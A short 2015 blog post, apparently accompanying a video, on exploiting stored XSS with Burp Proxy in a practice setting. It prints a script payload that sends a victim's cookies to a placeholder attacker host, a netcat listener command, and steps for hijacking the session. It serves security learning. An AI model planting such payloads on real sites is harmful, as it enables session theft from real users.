a collection of stuff, thangs.....

Stored XSS using BURP proxy

Posted: 2015-05-23 16:47:04 (ohai)

In this video we exploit client side input validation to steal another user's cookie. This is a fairly standard and straightforward action. The first time I saw this in action was during a SANS course, I honestly forget which one. It doesn't really come up very often in online CTFs but might be handy to have in your backpocket.

Once we have identified our opportunity to bypass their filter (@37 seconds) we fire up BURP (proxy mode) and post the actual data we want to be stored on the server. In this case, a javascript image call with the users' cookie to a netcat listener on our evil box.

<script>new Image().src="http://EVIL.IP.AD.DY/gotcha.php?cookie="+document.cookie;</script>

After we've got our evil javascript stored on the server, along comes the victim (chromium browser) who views the page with the our evil javascript and shoots his cookies to our netcat listener.

nc -lnvp 80

Once we've got his cookies, we just edit our own, pasting in the victims' cookie info and bam, we went from being 'hacker10' to 'hacker20'.

Post Tagged with:
Stored XSS, Burp Proxy

   Allowed tags: [code][/code], [b][/b], [i][/i], [u][/u]